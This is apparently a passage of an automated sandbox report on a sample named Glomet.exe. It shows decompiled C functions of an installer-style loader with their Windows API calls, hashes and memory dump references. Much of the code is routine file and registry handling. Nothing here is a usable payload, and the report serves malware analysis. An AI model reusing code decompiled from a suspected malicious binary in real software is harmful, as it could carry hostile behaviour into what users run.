                                                                                                                                                                              • Opcode Fuzzy Hash: d5f2437c19de5f7167ed681dec8eeca0f91e5fcafd86e9c866d4406102cdea3d
                                                                                                                                                                              • Instruction Fuzzy Hash: 3911BF71905205FFDB25CF64DA989AE7AB4AF01355F20483FE042B72C0D6B88A85DA6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                              			E00401389(signed int _a4) {
                                                                                                                                                                              				intOrPtr* _t6;
                                                                                                                                                                              				void* _t8;
                                                                                                                                                                              				void* _t10;
                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                              				void* _t12;
                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                              				void* _t18;
                                                                                                                                                                              
                                                                                                                                                                              				_t17 = _a4;
                                                                                                                                                                              				while(_t17 >= 0) {
                                                                                                                                                                              					_t6 = _t17 * 0x1c +  *0x42f450;
                                                                                                                                                                              					if( *_t6 == 1) {
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					_push(_t6); // executed
                                                                                                                                                                              					_t8 = E00401434(); // executed
                                                                                                                                                                              					if(_t8 == 0x7fffffff) {
                                                                                                                                                                              						return 0x7fffffff;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t10 = E0040136D(_t8);
                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                              						_t11 = _t10 - 1;
                                                                                                                                                                              						_t16 = _t17;
                                                                                                                                                                              						_t17 = _t11;
                                                                                                                                                                              						_t12 = _t11 - _t16;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t12 = _t10 + 1;
                                                                                                                                                                              						_t17 = _t17 + 1;
                                                                                                                                                                              					}
                                                                                                                                                                              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                                                                              						 *0x42ec0c =  *0x42ec0c + _t12;
                                                                                                                                                                              						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0); // executed
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}












                                                                                                                                                                              APIs
                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                                                                                                                              • Instruction ID: 2b84f8aef59f8f821fe865236d11139dc57ce13a72bb3d14165ba5b6471e206c
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                                                                                                                              • Instruction Fuzzy Hash: B101D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402429(void* __ebx, void* __edx) {
                                                                                                                                                                              				long _t6;
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              				long _t18;
                                                                                                                                                                              				void* _t20;
                                                                                                                                                                              				void* _t22;
                                                                                                                                                                              				void* _t23;
                                                                                                                                                                              
                                                                                                                                                                              				_t13 = __ebx;
                                                                                                                                                                              				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                                                                                                                              				_t20 = __edx;
                                                                                                                                                                              				if( *(_t23 - 0x18) != __ebx) {
                                                                                                                                                                              					_t6 = E00402CF7(_t20, E00402C39(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                                                                                                                                              					_t18 = _t6;
                                                                                                                                                                              					goto L4;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t22 = E00402C79(_t26, 2);
                                                                                                                                                                              					if(_t22 == __ebx) {
                                                                                                                                                                              						L6:
                                                                                                                                                                              						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t18 = RegDeleteValueA(_t22, E00402C39(0x33));
                                                                                                                                                                              						RegCloseKey(_t22);
                                                                                                                                                                              						L4:
                                                                                                                                                                              						if(_t18 != _t13) {
                                                                                                                                                                              							goto L6;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t23 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}










                                                                                                                                                                              APIs
                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244A
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseDeleteValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2831762973-0
                                                                                                                                                                              • Opcode ID: 1bb384650293dd56619855d1d7153f99383f55dccfab48f2542542db0f316a34
                                                                                                                                                                              • Instruction ID: c9f6a0f756bffd6fe36e262df4a8f1e623fbd2bf401ec17ba930b5ce720ddf8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bb384650293dd56619855d1d7153f99383f55dccfab48f2542542db0f316a34
                                                                                                                                                                              • Instruction Fuzzy Hash: B7F09632A04121ABE720ABB59B8EDAE62A89B50314F65443FF602B71C1D9F84D42566E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                                              • Opcode ID: 4ed62488277841c23d8b1794959b138f5c2732c1d52f517ca94279be51699118
                                                                                                                                                                              • Instruction ID: a3bdb2f40dd719ba1ad188037836e6c943fd99f7f2fd879611f3d3d4ba476820
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ed62488277841c23d8b1794959b138f5c2732c1d52f517ca94279be51699118
                                                                                                                                                                              • Instruction Fuzzy Hash: 34E01272A082009FD714EBA5AA8956EB7B4EB80365B60443FF101F11D1DBB858458A69
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00406663(signed int _a4) {
                                                                                                                                                                              				struct HINSTANCE__* _t5;
                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                              
                                                                                                                                                                              				_t10 = _a4 << 3;
                                                                                                                                                                              				_t8 =  *(_t10 + 0x40a240);
                                                                                                                                                                              				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                                              					L2:
                                                                                                                                                                              					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                                                                                                                                              				}
                                                                                                                                                                              				_t5 = E004065F5(_t8); // executed
                                                                                                                                                                              				if(_t5 == 0) {
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				goto L2;
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                                                                                                                                • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32 ref: 0040660C
                                                                                                                                                                                • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                                                                                                                                                • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                              • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                                                                                                                              • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                                                                                                                                              • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                                                                                                                              • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                              			E00405DEA(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                              				void* _t6;
                                                                                                                                                                              
                                                                                                                                                                              				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                              				asm("sbb ecx, ecx");
                                                                                                                                                                              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                                                              				return _t6;
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405DC5(CHAR* _a4) {
                                                                                                                                                                              				signed char _t3;
                                                                                                                                                                              				signed char _t7;
                                                                                                                                                                              
                                                                                                                                                                              				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                              				_t7 = _t3;
                                                                                                                                                                              				if(_t7 != 0xffffffff) {
                                                                                                                                                                              					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t7;
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004058BB(CHAR* _a4) {
                                                                                                                                                                              				int _t2;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                                              				if(_t2 == 0) {
                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                              				}
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402675(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                              				void* _t38;
                                                                                                                                                                              				void* _t41;
                                                                                                                                                                              
                                                                                                                                                                              				_t33 = __edx;
                                                                                                                                                                              				 *((intOrPtr*)(_t38 - 8)) = __ebx;
                                                                                                                                                                              				_t27 = E00402C17(2);
                                                                                                                                                                              				_t41 = _t27 - 1;
                                                                                                                                                                              				 *((intOrPtr*)(_t38 - 0x38)) = _t33;
                                                                                                                                                                              				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
                                                                                                                                                                              				if(_t41 < 0) {
                                                                                                                                                                              					L24:
                                                                                                                                                                              					 *0x42f4a8 =  *0x42f4a8 +  *(_t38 - 4);
                                                                                                                                                                              				} else {
                                                                                                                                                                              					__ecx = 0x3ff;
                                                                                                                                                                              					if(__eax > 0x3ff) {
                                                                                                                                                                              						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
                                                                                                                                                                              					}
                                                                                                                                                                              					if( *__esi == __bl) {
                                                                                                                                                                              						L21:
                                                                                                                                                                              						__esi =  *((intOrPtr*)(__ebp - 8));
                                                                                                                                                                              						goto L22;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						 *((char*)(__ebp + 0xb)) = __bl;
                                                                                                                                                                              						 *(__ebp - 0x30) = E004061CE(__ecx, __esi);
                                                                                                                                                                              						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                                                                                                                                                              							goto L21;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							__esi =  *((intOrPtr*)(__ebp - 8));
                                                                                                                                                                              							while(1) {
                                                                                                                                                                              								__eax = __ebp - 0xd;
                                                                                                                                                                              								__eax = E00405E62( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
                                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                                              									break;
                                                                                                                                                                              								}
                                                                                                                                                                              								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                                                                                              									 *(__ebp - 0xd) & 0x000000ff = E004061B5(__edi,  *(__ebp - 0xd) & 0x000000ff);
                                                                                                                                                                              								} else {
                                                                                                                                                                              									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                                                                                                                                                              										__al =  *(__ebp - 0xd);
                                                                                                                                                                              										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                                                                                                                                                              											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
                                                                                                                                                                              										} else {
                                                                                                                                                                              											 *((char*)(__esi + __edi)) = __al;
                                                                                                                                                                              											__esi = __esi + 1;
                                                                                                                                                                              										}
                                                                                                                                                                              										break;
                                                                                                                                                                              									} else {
                                                                                                                                                                              										__al =  *(__ebp - 0xd);
                                                                                                                                                                              										 *((char*)(__esi + __edi)) = __al;
                                                                                                                                                                              										__esi = __esi + 1;
                                                                                                                                                                              										 *((char*)(__ebp + 0xb)) = __al;
                                                                                                                                                                              										if(__al == __bl) {
                                                                                                                                                                              											break;
                                                                                                                                                                              										} else {
                                                                                                                                                                              											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                                                                                                                                                              												continue;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												break;
                                                                                                                                                                              											}
                                                                                                                                                                              										}
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L25;
                                                                                                                                                                              							}
                                                                                                                                                                              							L22:
                                                                                                                                                                              							 *((char*)(__esi + __edi)) = __bl;
                                                                                                                                                                              							if(_t41 == 0) {
                                                                                                                                                                              								 *(_t38 - 4) = 1;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L24;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				L25:
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}








                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: wsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2111968516-0
                                                                                                                                                                              • Opcode ID: 6b5af3765d5cf1b9f9f07b52c59eceaec621cd2aaca7de2b2ca3f3db680138bc
                                                                                                                                                                              • Instruction ID: de37bab72e455a498a4ff469eb517d64d021eea917781b3042bf3297e0f4bfdc
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b5af3765d5cf1b9f9f07b52c59eceaec621cd2aaca7de2b2ca3f3db680138bc
                                                                                                                                                                              • Instruction Fuzzy Hash: 5221F730C04289BEDF328F9886485AEBBB49F45314F14447FE491B73D1D6BD8A85CB2A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                              			E0040166A() {
                                                                                                                                                                              				int _t7;
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              				void* _t15;
                                                                                                                                                                              				void* _t20;
                                                                                                                                                                              
                                                                                                                                                                              				_t18 = E00402C39(0xffffffd0);
                                                                                                                                                                              				_t16 = E00402C39(0xffffffdf);
                                                                                                                                                                              				E00402C39(0x13);
                                                                                                                                                                              				_t7 = MoveFileA(_t4, _t5); // executed
                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                              					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004065CE(_t18) == 0) {
                                                                                                                                                                              						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						E00406030(_t15, _t18, _t16);
                                                                                                                                                                              						_push(0xffffffe4);
                                                                                                                                                                              						goto L5;
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_push(0xffffffe3);
                                                                                                                                                                              					L5:
                                                                                                                                                                              					E00401423();
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t20 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}








                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileMove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3562171763-0
                                                                                                                                                                              • Opcode ID: f315d12e12ef7a2c5b0005b3520eeb34d1e5de220c17f338371428510616054a
                                                                                                                                                                              • Instruction ID: 86c8250a8eaca220701d655684c56ae394e352fbac7a718e03cec18255673dc0
                                                                                                                                                                              • Opcode Fuzzy Hash: f315d12e12ef7a2c5b0005b3520eeb34d1e5de220c17f338371428510616054a
                                                                                                                                                                              • Instruction Fuzzy Hash: EFF09631618124A7DB206BB54F4DE5F12A48B51379B24063FF011B21D0DAFD850155AF
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040239B(void* __ecx, void* __edx, signed int* __edi) {
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              
                                                                                                                                                                              				 *__edi =  *__edi & 0x000000f4;
                                                                                                                                                                              				 *0xf4 =  *0xf4 + 0xf4;
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
